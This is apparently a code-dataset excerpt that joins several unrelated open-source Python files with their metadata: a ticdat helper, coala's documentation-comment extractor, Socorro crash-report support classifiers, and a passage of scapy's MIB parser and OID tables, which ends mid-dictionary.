assert tdf.good_tic_dat_object(ticdat), "ticdat not a good object for the tdf"
assert tu.dictish(mapping)
def apply_mapping(k):
if containerish(k):
return tuple(list(map(apply_mapping, k)))
return mapping.get(k, k)
rtn = tdf.copy_tic_dat(ticdat)
for t in tdf.all_tables:
if tdf.primary_key_fields.get(t):
for k,v in getattr(ticdat, t).items():
del getattr(rtn, t)[k]
getattr(rtn, t)[apply_mapping(k)] = v
return rtn
def _sorted_tables(tdf):
"""
:param tdf: a TicDatFactory
:return: A list of tables that is sorted so primary keys are defined before other tables where they are used
"""
ordered_tables = []
dict_tables = {t for t, pk in tdf.primary_key_fields.items() if pk}
def next_table(tbn):
fks = list(filter(lambda k: k.native_table == tbn, tdf.foreign_keys))
if len(fks) == 0:
return [tbn]
tables = []
for fk in fks:
if fk.foreign_table not in tables + ordered_tables:
tables += next_table(fk.foreign_table)
return tables + [tbn]
for tbn in dict_tables:
for table in next_table(tbn):
if table not in ordered_tables:
ordered_tables.append(table)
return ordered_tables | bsd-2-clause | -1,763,562,608,612,621,800 | 41.895522 | 125 | 0.608393 | false |
stevemontana1980/coala | coalib/bearlib/languages/documentation/DocumentationExtraction.py | 2 | 11010 | import re
from coalib.bearlib.languages.documentation.DocstyleDefinition import (
DocstyleDefinition)
from coalib.bearlib.languages.documentation.DocumentationComment import (
DocumentationComment)
from coalib.results.TextRange import TextRange
def _extract_doc_comment_simple(content, line, column, markers):
"""
Extract a documentation that starts at given beginning with simple layout.
The property of the simple layout is that there's no each-line marker. This
applies e.g. for python docstrings.
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
align_column = column - len(markers[0])
pos = content[line].find(markers[2], column)
if pos != -1:
return line, pos + len(markers[2]), content[line][column:pos]
doc_comment = content[line][column:]
line += 1
while line < len(content):
pos = content[line].find(markers[2])
if pos == -1:
doc_comment += ("\n" if content[line][align_column:] == ""
else content[line][align_column:])
else:
doc_comment += content[line][align_column:pos]
return line, pos + len(markers[2]), doc_comment
line += 1
return None
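# Illustrative example (not from the original sources): for Python docstrings
# the marker triple is typically ('"""', '', '"""').  Given
#   content = ['def f():\n', '    """Docs\n', '    more text."""\n']
# the call _extract_doc_comment_simple(content, 1, 7, ('"""', '', '"""'))
# returns (2, 17, 'Docs\nmore text.'), i.e. end line, end column and the text.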
def _extract_doc_comment_continuous(content, line, column, markers):
"""
Extract a documentation that starts at given beginning with continuous
layout.
The property of the continuous layout is that the each-line-marker and the
    end-marker are equal. Documentation is extracted until no further marker is
found. Applies e.g. for doxygen style python documentation:
```
## main
#
# detailed
```
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
marker_len = len(markers[1])
doc_comment = content[line][column:]
line += 1
while line < len(content):
pos = content[line].find(markers[1])
if pos == -1:
return line, 0, doc_comment
else:
doc_comment += content[line][pos + marker_len:]
line += 1
if content[line - 1][-1] == "\n":
column = 0
else:
# This case can appear on end-of-document without a ``\n``.
line -= 1
column = len(content[line])
return line, column, doc_comment
def _extract_doc_comment_standard(content, line, column, markers):
"""
Extract a documentation that starts at given beginning with standard
layout.
The standard layout applies e.g. for C doxygen-style documentation:
```
/**
* documentation
*/
```
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
pos = content[line].find(markers[2], column)
if pos != -1:
return line, pos + len(markers[2]), content[line][column:pos]
doc_comment = content[line][column:]
line += 1
while line < len(content):
pos = content[line].find(markers[2])
each_line_pos = content[line].find(markers[1])
if pos == -1:
if each_line_pos == -1:
# If the first text occurrence is not the each-line marker
# now we violate the doc-comment layout.
return None
doc_comment += content[line][each_line_pos + len(markers[1]):]
else:
# If no each-line marker found or it's located past the end marker:
# extract no further and end the doc-comment.
if each_line_pos != -1 and each_line_pos + 1 < pos:
doc_comment += content[line][each_line_pos +
len(markers[1]):pos]
return line, pos + len(markers[2]), doc_comment
line += 1
return None
def _extract_doc_comment(content, line, column, markers):
"""
Delegates depending on the given markers to the right extraction method.
:param content: Presplitted lines of the source-code-string.
:param line: Line where the documentation comment starts (behind the
start marker). Zero-based.
:param column: Column where the documentation comment starts (behind the
start marker). Zero-based.
:param markers: The documentation identifying markers.
:return: If the comment matched layout a triple with end-of-comment
line, column and the extracted documentation. If not
matched, returns None.
"""
if markers[1] == "":
# Extract and align to start marker.
return _extract_doc_comment_simple(content, line, column, markers)
elif markers[1] == markers[2]:
# Search for the each-line marker until it runs out.
return _extract_doc_comment_continuous(content, line, column, markers)
else:
return _extract_doc_comment_standard(content, line, column, markers)
def _compile_multi_match_regex(strings):
"""
Compiles a regex object that matches each of the given strings.
:param strings: The strings to match.
:return: A regex object.
"""
return re.compile("|".join(re.escape(s) for s in strings))
def _extract_doc_comment_from_line(content, line, column, regex,
marker_dict, docstyle_definition):
cur_line = content[line]
begin_match = regex.search(cur_line, column)
if begin_match:
indent = cur_line[:begin_match.start()]
column = begin_match.end()
for marker in marker_dict[begin_match.group()]:
doc_comment = _extract_doc_comment(content, line, column, marker)
if doc_comment is not None:
end_line, end_column, documentation = doc_comment
rng = TextRange.from_values(line + 1,
begin_match.start() + 1,
end_line + 1,
end_column + 1)
doc = DocumentationComment(documentation, docstyle_definition,
indent, marker, rng)
return end_line, end_column, doc
return line + 1, 0, None
def extract_documentation_with_markers(content, docstyle_definition):
"""
Extracts all documentation texts inside the given source-code-string.
:param content: The source-code-string where to extract documentation from.
Needs to be a list or tuple where each string item is a
single line (including ending whitespaces like ``\\n``).
:param markers: The list/tuple of marker-sets that identify a
documentation-comment. Low-index markers have higher
priority than high-index markers.
:return: An iterator returning each DocumentationComment found in
the content.
"""
# Prepare marker-tuple dict that maps a begin pattern to the corresponding
# marker_set(s). This makes it faster to retrieve a marker-set from a
# begin sequence we initially want to search for in source code. Then
# the possible found documentation match is processed further with the
# rest markers.
markers = docstyle_definition.markers
marker_dict = {}
for marker_set in markers:
if marker_set[0] not in marker_dict:
marker_dict[marker_set[0]] = [marker_set]
else:
marker_dict[marker_set[0]].append(marker_set)
# Using regexes to perform a variable match is faster than finding each
# substring with ``str.find()`` choosing the lowest match.
begin_regex = _compile_multi_match_regex(
marker_set[0] for marker_set in markers)
line = 0
column = 0
while line < len(content):
line, column, doc = _extract_doc_comment_from_line(
content,
line,
column,
begin_regex,
marker_dict,
docstyle_definition)
if doc:
yield doc
def extract_documentation(content, language, docstyle):
"""
Extracts all documentation texts inside the given source-code-string using
the coala docstyle definition files.
The documentation texts are sorted by their order appearing in ``content``.
For more information about how documentation comments are identified and
extracted, see DocstyleDefinition.doctypes enumeration.
:param content: The source-code-string where to extract
documentation from. Needs to be a list or tuple
where each string item is a single line
(including ending whitespaces like ``\\n``).
:param language: The programming language used.
:param docstyle: The documentation style/tool used
(e.g. doxygen).
:raises FileNotFoundError: Raised when the docstyle definition file was not
found.
:raises KeyError: Raised when the given language is not defined in
given docstyle.
:raises ValueError: Raised when a docstyle definition setting has an
invalid format.
:return: An iterator returning each DocumentationComment
found in the content.
"""
docstyle_definition = DocstyleDefinition.load(language, docstyle)
return extract_documentation_with_markers(content, docstyle_definition)
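# Minimal usage sketch (illustrative only; assumes the bundled "default"
# docstyle definition for "python" is available and "example.py" exists):
#
#   with open("example.py") as f:
#       content = f.readlines()
#   for doc in extract_documentation(content, "python", "default"):
#       print(doc.documentation, doc.range)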
| agpl-3.0 | 6,445,702,230,881,130,000 | 37.904594 | 79 | 0.607902 | false |
bsmedberg/socorro | socorro/processor/support_classifiers.py | 1 | 14965 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
This module creates the classifications.support part of the processed crash. All
the support classification rules live here.
{...
'classifications': {
'support': {
'classification': 'some classification',
'classification_data': 'extra information saved by rule',
'classification_version': '0.0',
}
}
...
}
"""
from socorro.lib.ver_tools import normalize
from socorro.lib.util import DotDict
from sys import maxint
#==============================================================================
class SupportClassificationRule(object):
"""the base class for Support Rules. It provides the framework for the
    rules 'predicate', 'action', and 'version' as well as utilities to help
rules do their jobs."""
#--------------------------------------------------------------------------
def predicate(self, raw_crash, processed_crash, processor):
"""the default predicate for Support Classifiers invokes any derivied
_predicate function, trapping any exceptions raised in the process. We
are obligated to catch these exceptions to give subsequent rules the
        opportunity to act. An error during the predicate application is a
failure of the rule, not a failure of the classification system itself
"""
try:
return self._predicate(raw_crash, processed_crash, processor)
except Exception, x:
processor.config.logger.debug(
'support_classifier: %s predicate rejection - consideration of'
' %s failed because of "%s"',
self.__class__,
raw_crash.get('uuid', 'unknown uuid'),
x,
exc_info=True
)
return False
#--------------------------------------------------------------------------
def _predicate(self, raw_crash, processed_crash, processor):
""""The default support classifier predicate just returns True. We
want all the support classifiers run.
parameters:
raw_crash - a mapping representing the raw crash data originally
submitted by the client
processed_crash - the ultimate result of the processor, this is the
                              analyzed version of a crash. It contains the
output of the MDSW program for each of the dumps
within the crash.
processor - a reference to the processor object that is assigned
to working on the current crash. This object contains
resources that might be useful to a classifier rule.
'processor.config' is the configuration for the
                        processor in which database connection parameters can
be found. 'processor.config.logger' is useful for any
logging of debug information.
'processor.c_signature_tool' or
'processor.java_signature_tool' contain utilities that
might be useful during classification.
returns:
True - this rule should be applied
False - this rule should not be applied
"""
return True
#--------------------------------------------------------------------------
def action(self, raw_crash, processed_crash, processor):
"""the default action for Support Classifiers invokes any derivied
_action function, trapping any exceptions raised in the process. We
are obligated to catch these exceptions to give subsequent rules the
        opportunity to act and perhaps mitigate the error. An error during the
action application is a failure of the rule, not a failure of the
classification system itself."""
try:
return self._action(raw_crash, processed_crash, processor)
except KeyError, x:
processor.config.logger.debug(
'support_classifier: %s action failure - %s failed because of '
'"%s"',
self.__class__,
raw_crash.get('uuid', 'unknown uuid'),
x,
)
except Exception, x:
processor.config.logger.debug(
'support_classifier: %s action failure - %s failed because of '
'"%s"',
self.__class__,
raw_crash.get('uuid', 'unknown uuid'),
x,
exc_info=True
)
return False
#--------------------------------------------------------------------------
def _action(self, raw_crash, processed_crash, processor):
"""Rules derived from this base class ought to override this method
with an actual classification rule. Successful application of this
method should include a call to '_add_classification'.
parameters:
raw_crash - a mapping representing the raw crash data originally
submitted by the client
processed_crash - the ultimate result of the processor, this is the
analized version of a crash. It contains the
output of the MDSW program for each of the dumps
within the crash.
processor - a reference to the processor object that is assigned
to working on the current crash. This object contains
resources that might be useful to a classifier rule.
'processor.config' is the configuration for the
processor in which database connection paramaters can
be found. 'processor.config.logger' is useful for any
logging of debug information.
'processor.c_signature_tool' or
'processor.java_signature_tool' contain utilities that
might be useful during classification.
returns:
True - this rule was applied successfully and no further rules
should be applied
False - this rule did not succeed and further rules should be
tried
"""
return True
#--------------------------------------------------------------------------
def version(self):
"""This method should be overridden in a base class."""
return '0.0'
#--------------------------------------------------------------------------
def _add_classification(
self,
processed_crash,
classification,
classification_data,
logger=None
):
"""This method adds a 'support' classification to a processed
crash.
parameters:
processed_crash - a reference to the processed crash to which the
classification is to be added.
classification - a string that is the classification.
classification_data - a string of extra data that goes along with a
classification
"""
if 'classifications' not in processed_crash:
processed_crash['classifications'] = DotDict()
processed_crash['classifications']['support'] = DotDict({
'classification': classification,
'classification_data': classification_data,
'classification_version': self.version()
})
if logger:
logger.debug(
'Support classification: %s',
classification
)
return True
#==============================================================================
class BitguardClassifier(SupportClassificationRule):
"""To satisfy Bug 931907, this rule will detect 'bitguard.dll' in the
modules list. If present, it will add the classification,
classifications.support.classification.bitguard to the processed crash"""
#--------------------------------------------------------------------------
def version(self):
return '1.0'
#--------------------------------------------------------------------------
def _action(self, raw_crash, processed_crash, processor):
for a_module in processed_crash['json_dump']['modules']:
if a_module['filename'] == 'bitguard.dll':
self._add_classification(
processed_crash,
'bitguard',
None,
processor.config.logger
)
return True
# bitguard was never found, this rule fails
return False
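#==============================================================================
# Illustrative sketch only (not one of the deployed Socorro rules): the class
# below shows the minimal shape of a rule built on SupportClassificationRule.
# The module name 'exampledriver.dll' and the classification string are
# hypothetical.
class _ExampleDllClassifier(SupportClassificationRule):
    """flag crashes that loaded a hypothetical 'exampledriver.dll' module"""
    #--------------------------------------------------------------------------
    def version(self):
        return '0.1'
    #--------------------------------------------------------------------------
    def _action(self, raw_crash, processed_crash, processor):
        for a_module in processed_crash['json_dump']['modules']:
            if a_module['filename'] == 'exampledriver.dll':
                return self._add_classification(
                    processed_crash,
                    'example-dll',
                    None,
                    processor.config.logger
                )
        return False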
#==============================================================================
class OutOfDateClassifier(SupportClassificationRule):
"""To satisfy Bug 956879, this rule will detect classify crashes as out
of date if the version is less than the threshold
'firefox_out_of_date_version' found in the processor configuration"""
#--------------------------------------------------------------------------
def version(self):
return '1.0'
#--------------------------------------------------------------------------
def _predicate(self, raw_crash, processed_crash, processor):
try:
return (
raw_crash.ProductName == 'Firefox'
and normalize(raw_crash.Version) < self.out_of_date_threshold
)
except AttributeError:
self.out_of_date_threshold = normalize(
processor.config.firefox_out_of_date_version
)
return self._predicate(raw_crash, processed_crash, processor)
#--------------------------------------------------------------------------
@staticmethod
def _normalize_windows_version(version_str):
ver_list = version_str.split('.')[:2]
def as_int(x):
try:
return int(x)
except ValueError:
return maxint
# get the first integer out of the last last token
ver_list[-1] = ver_list[-1].split(' ')[0]
ver_list_normalized = [as_int(x) for x in ver_list]
if "Service" in version_str:
try:
# assume last space delimited field is service pack number
ver_list_normalized.append(int(version_str.split(' ')[-1]))
except ValueError: # appears to have been a bad assumption
ver_list_normalized.append(0)
return tuple(ver_list_normalized)
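    # For illustration (hypothetical version strings): the normalizer above
    # maps "5.1.2600 Service Pack 3" to (5, 1, 3) and "6.1.7601" to (6, 1),
    # which is what the WinXP SP2 threshold check below compares against.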
#--------------------------------------------------------------------------
def _windows_action(self, raw_crash, processed_crash, processor):
win_version_normalized = self._normalize_windows_version(
processed_crash["json_dump"]["system_info"]["os_ver"]
)
if win_version_normalized[:2] == (5, 0): # Win2K
return self._add_classification(
processed_crash,
'firefox-no-longer-works-windows-2000',
None,
processor.config.logger
)
elif win_version_normalized < (5, 1, 3): # WinXP SP2
return self._add_classification(
processed_crash,
'firefox-no-longer-works-some-versions-windows-xp',
None,
processor.config.logger
)
return self._add_classification(
processed_crash,
'update-firefox-latest-version',
None,
processor.config.logger
)
#--------------------------------------------------------------------------
@staticmethod
def _normalize_osx_version(version_str):
ver_list = version_str.split('.')[:2]
def as_int(x):
try:
return int(x)
except ValueError:
return maxint
return tuple(as_int(x) for x in ver_list)
#--------------------------------------------------------------------------
def _osx_action(self, raw_crash, processed_crash, processor):
osx_version_normalized = self._normalize_osx_version(
processed_crash["json_dump"]["system_info"]["os_ver"]
)
if (osx_version_normalized <= (10, 4) or
processed_crash["json_dump"]["system_info"]["cpu_arch"] == 'ppc'
):
return self._add_classification(
processed_crash,
'firefox-no-longer-works-mac-os-10-4-or-powerpc',
None,
processor.config.logger
)
elif osx_version_normalized == (10, 5):
return self._add_classification(
processed_crash,
'firefox-no-longer-works-mac-os-x-10-5',
None,
processor.config.logger
)
return self._add_classification(
processed_crash,
'update-firefox-latest-version',
None,
processor.config.logger
)
#--------------------------------------------------------------------------
def _action(self, raw_crash, processed_crash, processor):
crashed_version = normalize(raw_crash.Version)
if "Win" in processed_crash["json_dump"]["system_info"]['os']:
return self._windows_action(raw_crash, processed_crash, processor)
elif processed_crash["json_dump"]["system_info"]['os'] == "Mac OS X":
return self._osx_action(raw_crash, processed_crash, processor)
else:
return self._add_classification(
processed_crash,
'update-firefox-latest-version',
None,
processor.config.logger
)
#------------------------------------------------------------------------------
# the following tuple of tuples is a structure for loading rules into the
# TransformRules system. The tuples take the form:
# predicate_function, predicate_args, predicate_kwargs,
# action_function, action_args, action_kwargs.
#
# The args and kwargs components are additional information that a predicate
# or an action might need to have to do its job. Providing values for args
# or kwargs essentially acts in a manner similar to functools.partial.
# When the predicate or action functions are invoked, these args and kwags
# values will be passed into the function along with the raw_crash,
# processed_crash and processor objects.
default_support_classifier_rules = (
(BitguardClassifier, (), {}, BitguardClassifier, (), {}),
(OutOfDateClassifier, (), {}, OutOfDateClassifier, (), {}),
)
| mpl-2.0 | 4,439,334,082,690,474,000 | 42.376812 | 79 | 0.522285 | false |
guedou/scapy-python2.5 | scapy/asn1/mib.py | 6 | 28459 | ## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more information
## Copyright (C) Philippe Biondi <[email protected]>
## Modified by Maxence Tury <[email protected]>
## This program is published under a GPLv2 license
"""
Management Information Base (MIB) parsing
"""
import re
from glob import glob
from scapy.dadict import DADict,fixname
from scapy.config import conf
from scapy.utils import do_graph
#################
## MIB parsing ##
#################
_mib_re_integer = re.compile("^[0-9]+$")
_mib_re_both = re.compile("^([a-zA-Z_][a-zA-Z0-9_-]*)\(([0-9]+)\)$")
_mib_re_oiddecl = re.compile("$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}",re.M)
_mib_re_strings = re.compile('"[^"]*"')
_mib_re_comments = re.compile('--.*(\r|\n)')
class MIBDict(DADict):
def _findroot(self, x):
if x.startswith("."):
x = x[1:]
if not x.endswith("."):
x += "."
max=0
root="."
for k in self.iterkeys():
if x.startswith(self[k]+"."):
if max < len(self[k]):
max = len(self[k])
root = k
return root, x[max:-1]
def _oidname(self, x):
root,remainder = self._findroot(x)
return root+remainder
def _oid(self, x):
xl = x.strip(".").split(".")
p = len(xl)-1
while p >= 0 and _mib_re_integer.match(xl[p]):
p -= 1
if p != 0 or xl[p] not in self:
return x
xl[p] = self[xl[p]]
return ".".join(xl[p:])
def _make_graph(self, other_keys=None, **kargs):
if other_keys is None:
other_keys = []
nodes = [(k, self[k]) for k in self.iterkeys()]
oids = [self[k] for k in self.iterkeys()]
for k in other_keys:
if k not in oids:
                nodes.append((self._oidname(k), k))
s = 'digraph "mib" {\n\trankdir=LR;\n\n'
for k,o in nodes:
s += '\t"%s" [ label="%s" ];\n' % (o,k)
s += "\n"
for k,o in nodes:
parent,remainder = self._findroot(o[:-1])
remainder = remainder[1:]+o[-1]
if parent != ".":
parent = self[parent]
s += '\t"%s" -> "%s" [label="%s"];\n' % (parent, o,remainder)
s += "}\n"
do_graph(s, **kargs)
def __len__(self):
return len(self.keys())
def mib_register(ident, value, the_mib, unresolved):
if ident in the_mib or ident in unresolved:
return ident in the_mib
resval = []
not_resolved = 0
for v in value:
if _mib_re_integer.match(v):
resval.append(v)
else:
v = fixname(v)
if v not in the_mib:
not_resolved = 1
if v in the_mib:
v = the_mib[v]
elif v in unresolved:
v = unresolved[v]
if type(v) is list:
resval += v
else:
resval.append(v)
if not_resolved:
unresolved[ident] = resval
return False
else:
the_mib[ident] = resval
keys = unresolved.keys()
i = 0
while i < len(keys):
k = keys[i]
if mib_register(k,unresolved[k], the_mib, {}):
del(unresolved[k])
del(keys[i])
i = 0
else:
i += 1
return True
def load_mib(filenames):
the_mib = {'iso': ['1']}
unresolved = {}
for k in conf.mib.iterkeys():
mib_register(k, conf.mib[k].split("."), the_mib, unresolved)
if type(filenames) is str:
filenames = [filenames]
for fnames in filenames:
for fname in glob(fnames):
f = open(fname)
text = f.read()
cleantext = " ".join(_mib_re_strings.split(" ".join(_mib_re_comments.split(text))))
for m in _mib_re_oiddecl.finditer(cleantext):
gr = m.groups()
ident,oid = gr[0],gr[-1]
ident=fixname(ident)
oid = oid.split()
for i, elt in enumerate(oid):
m = _mib_re_both.match(elt)
if m:
oid[i] = m.groups()[1]
mib_register(ident, oid, the_mib, unresolved)
newmib = MIBDict(_name="MIB")
for k,o in the_mib.iteritems():
newmib[k]=".".join(o)
for k,o in unresolved.iteritems():
newmib[k]=".".join(o)
conf.mib=newmib
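# Illustrative usage (the path below is hypothetical; any glob of MIB files
# works).  After loading, OIDs can be translated back to names:
#
#   load_mib("/usr/share/snmp/mibs/*")
#   conf.mib._oidname("1.2.840.113549.1.9.1")    # -> 'emailAddress'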
####################
## OID references ##
####################
####### pkcs1 #######
pkcs1_oids = {
"rsaEncryption" : "1.2.840.113549.1.1.1",
"md2WithRSAEncryption" : "1.2.840.113549.1.1.2",
"md4WithRSAEncryption" : "1.2.840.113549.1.1.3",
"md5WithRSAEncryption" : "1.2.840.113549.1.1.4",
"sha1-with-rsa-signature" : "1.2.840.113549.1.1.5",
"rsaOAEPEncryptionSET" : "1.2.840.113549.1.1.6",
"id-RSAES-OAEP" : "1.2.840.113549.1.1.7",
"id-mgf1" : "1.2.840.113549.1.1.8",
"id-pSpecified" : "1.2.840.113549.1.1.9",
"rsassa-pss" : "1.2.840.113549.1.1.10",
"sha256WithRSAEncryption" : "1.2.840.113549.1.1.11",
"sha384WithRSAEncryption" : "1.2.840.113549.1.1.12",
"sha512WithRSAEncryption" : "1.2.840.113549.1.1.13",
"sha224WithRSAEncryption" : "1.2.840.113549.1.1.14"
}
####### pkcs9 #######
pkcs9_oids = {
"modules" : "1.2.840.113549.1.9.0",
"emailAddress" : "1.2.840.113549.1.9.1",
"unstructuredName" : "1.2.840.113549.1.9.2",
"contentType" : "1.2.840.113549.1.9.3",
"messageDigest" : "1.2.840.113549.1.9.4",
"signing-time" : "1.2.840.113549.1.9.5",
"countersignature" : "1.2.840.113549.1.9.6",
"challengePassword" : "1.2.840.113549.1.9.7",
"unstructuredAddress" : "1.2.840.113549.1.9.8",
"extendedCertificateAttributes" : "1.2.840.113549.1.9.9",
"signingDescription" : "1.2.840.113549.1.9.13",
"extensionRequest" : "1.2.840.113549.1.9.14",
"smimeCapabilities" : "1.2.840.113549.1.9.15",
"smime" : "1.2.840.113549.1.9.16",
"pgpKeyID" : "1.2.840.113549.1.9.17",
"friendlyName" : "1.2.840.113549.1.9.20",
"localKeyID" : "1.2.840.113549.1.9.21",
"certTypes" : "1.2.840.113549.1.9.22",
"crlTypes" : "1.2.840.113549.1.9.23",
"pkcs-9-oc" : "1.2.840.113549.1.9.24",
"pkcs-9-at" : "1.2.840.113549.1.9.25",
"pkcs-9-sx" : "1.2.840.113549.1.9.26",
"pkcs-9-mr" : "1.2.840.113549.1.9.27",
"id-aa-CMSAlgorithmProtection" : "1.2.840.113549.1.9.52"
}
####### x509 #######
attributeType_oids = {
"objectClass" : "2.5.4.0",
"aliasedEntryName" : "2.5.4.1",
"knowledgeInformation" : "2.5.4.2",
"commonName" : "2.5.4.3",
"surname" : "2.5.4.4",
"serialNumber" : "2.5.4.5",
"countryName" : "2.5.4.6",
"localityName" : "2.5.4.7",
"stateOrProvinceName" : "2.5.4.8",
"streetAddress" : "2.5.4.9",
"organizationName" : "2.5.4.10",
"organizationUnitName" : "2.5.4.11",
"title" : "2.5.4.12",
"description" : "2.5.4.13",
"searchGuide" : "2.5.4.14",
"businessCategory" : "2.5.4.15",
"postalAddress" : "2.5.4.16",
"postalCode" : "2.5.4.17",
"postOfficeBox" : "2.5.4.18",
"physicalDeliveryOfficeName" : "2.5.4.19",
"telephoneNumber" : "2.5.4.20",
"telexNumber" : "2.5.4.21",
"teletexTerminalIdentifier" : "2.5.4.22",
"facsimileTelephoneNumber" : "2.5.4.23",
"x121Address" : "2.5.4.24",
"internationalISDNNumber" : "2.5.4.25",
"registeredAddress" : "2.5.4.26",
"destinationIndicator" : "2.5.4.27",
"preferredDeliveryMethod" : "2.5.4.28",
"presentationAddress" : "2.5.4.29",
"supportedApplicationContext" : "2.5.4.30",
"member" : "2.5.4.31",
"owner" : "2.5.4.32",
"roleOccupant" : "2.5.4.33",
"seeAlso" : "2.5.4.34",
"userPassword" : "2.5.4.35",
"userCertificate" : "2.5.4.36",
"cACertificate" : "2.5.4.37",
"authorityRevocationList" : "2.5.4.38",
"certificateRevocationList" : "2.5.4.39",
"crossCertificatePair" : "2.5.4.40",
"name" : "2.5.4.41",
"givenName" : "2.5.4.42",
"initials" : "2.5.4.43",
"generationQualifier" : "2.5.4.44",
"uniqueIdentifier" : "2.5.4.45",
"dnQualifier" : "2.5.4.46",
"enhancedSearchGuide" : "2.5.4.47",
"protocolInformation" : "2.5.4.48",
"distinguishedName" : "2.5.4.49",
"uniqueMember" : "2.5.4.50",
"houseIdentifier" : "2.5.4.51",
"supportedAlgorithms" : "2.5.4.52",
"deltaRevocationList" : "2.5.4.53",
"dmdName" : "2.5.4.54",
"clearance" : "2.5.4.55",
"defaultDirQop" : "2.5.4.56",
"attributeIntegrityInfo" : "2.5.4.57",
"attributeCertificate" : "2.5.4.58",
"attributeCertificateRevocationList": "2.5.4.59",
"confKeyInfo" : "2.5.4.60",
"aACertificate" : "2.5.4.61",
"attributeDescriptorCertificate" : "2.5.4.62",
"attributeAuthorityRevocationList" : "2.5.4.63",
"family-information" : "2.5.4.64",
"pseudonym" : "2.5.4.65",
"communicationsService" : "2.5.4.66",
"communicationsNetwork" : "2.5.4.67",
"certificationPracticeStmt" : "2.5.4.68",
"certificatePolicy" : "2.5.4.69",
"pkiPath" : "2.5.4.70",
"privPolicy" : "2.5.4.71",
"role" : "2.5.4.72",
"delegationPath" : "2.5.4.73",
"protPrivPolicy" : "2.5.4.74",
"xMLPrivilegeInfo" : "2.5.4.75",
"xmlPrivPolicy" : "2.5.4.76",
"uuidpair" : "2.5.4.77",
"tagOid" : "2.5.4.78",
"uiiFormat" : "2.5.4.79",
"uiiInUrh" : "2.5.4.80",
"contentUrl" : "2.5.4.81",
"permission" : "2.5.4.82",
"uri" : "2.5.4.83",
"pwdAttribute" : "2.5.4.84",
"userPwd" : "2.5.4.85",
"urn" : "2.5.4.86",
"url" : "2.5.4.87",
"utmCoordinates" : "2.5.4.88",
"urnC" : "2.5.4.89",
"uii" : "2.5.4.90",
"epc" : "2.5.4.91",
"tagAfi" : "2.5.4.92",
"epcFormat" : "2.5.4.93",
"epcInUrn" : "2.5.4.94",
"ldapUrl" : "2.5.4.95",
"ldapUrl" : "2.5.4.96",
"organizationIdentifier" : "2.5.4.97"
}
certificateExtension_oids = {
"authorityKeyIdentifier" : "2.5.29.1",
"keyAttributes" : "2.5.29.2",
"certificatePolicies" : "2.5.29.3",
"keyUsageRestriction" : "2.5.29.4",
"policyMapping" : "2.5.29.5",
"subtreesConstraint" : "2.5.29.6",
"subjectAltName" : "2.5.29.7",
"issuerAltName" : "2.5.29.8",
"subjectDirectoryAttributes" : "2.5.29.9",
"basicConstraints" : "2.5.29.10",
"subjectKeyIdentifier" : "2.5.29.14",
"keyUsage" : "2.5.29.15",
"privateKeyUsagePeriod" : "2.5.29.16",
"subjectAltName" : "2.5.29.17",
"issuerAltName" : "2.5.29.18",
"basicConstraints" : "2.5.29.19",
"cRLNumber" : "2.5.29.20",
"reasonCode" : "2.5.29.21",
"expirationDate" : "2.5.29.22",
"instructionCode" : "2.5.29.23",
"invalidityDate" : "2.5.29.24",
"cRLDistributionPoints" : "2.5.29.25",
"issuingDistributionPoint" : "2.5.29.26",
"deltaCRLIndicator" : "2.5.29.27",
"issuingDistributionPoint" : "2.5.29.28",
"certificateIssuer" : "2.5.29.29",
"nameConstraints" : "2.5.29.30",
"cRLDistributionPoints" : "2.5.29.31",
"certificatePolicies" : "2.5.29.32",
"policyMappings" : "2.5.29.33",
"policyConstraints" : "2.5.29.34",
"authorityKeyIdentifier" : "2.5.29.35",
"policyConstraints" : "2.5.29.36",
"extKeyUsage" : "2.5.29.37",
"authorityAttributeIdentifier" : "2.5.29.38",
"roleSpecCertIdentifier" : "2.5.29.39",
"cRLStreamIdentifier" : "2.5.29.40",
"basicAttConstraints" : "2.5.29.41",
"delegatedNameConstraints" : "2.5.29.42",
"timeSpecification" : "2.5.29.43",
"cRLScope" : "2.5.29.44",
"statusReferrals" : "2.5.29.45",
"freshestCRL" : "2.5.29.46",
"orderedList" : "2.5.29.47",
"attributeDescriptor" : "2.5.29.48",
"userNotice" : "2.5.29.49",
"sOAIdentifier" : "2.5.29.50",
"baseUpdateTime" : "2.5.29.51",
"acceptableCertPolicies" : "2.5.29.52",
"deltaInfo" : "2.5.29.53",
"inhibitAnyPolicy" : "2.5.29.54",
"targetInformation" : "2.5.29.55",
"noRevAvail" : "2.5.29.56",
"acceptablePrivilegePolicies" : "2.5.29.57",
"id-ce-toBeRevoked" : "2.5.29.58",
"id-ce-RevokedGroups" : "2.5.29.59",
"id-ce-expiredCertsOnCRL" : "2.5.29.60",
"indirectIssuer" : "2.5.29.61",
"id-ce-noAssertion" : "2.5.29.62",
"id-ce-aAissuingDistributionPoint" : "2.5.29.63",
"id-ce-issuedOnBehaIFOF" : "2.5.29.64",
"id-ce-singleUse" : "2.5.29.65",
"id-ce-groupAC" : "2.5.29.66",
"id-ce-allowedAttAss" : "2.5.29.67",
"id-ce-attributeMappings" : "2.5.29.68",
"id-ce-holderNameConstraints" : "2.5.29.69"
}
certExt_oids = {
"cert-type" : "2.16.840.1.113730.1.1",
"base-url" : "2.16.840.1.113730.1.2",
"revocation-url" : "2.16.840.1.113730.1.3",
"ca-revocation-url" : "2.16.840.1.113730.1.4",
"ca-crl-url" : "2.16.840.1.113730.1.5",
"ca-cert-url" : "2.16.840.1.113730.1.6",
"renewal-url" : "2.16.840.1.113730.1.7",
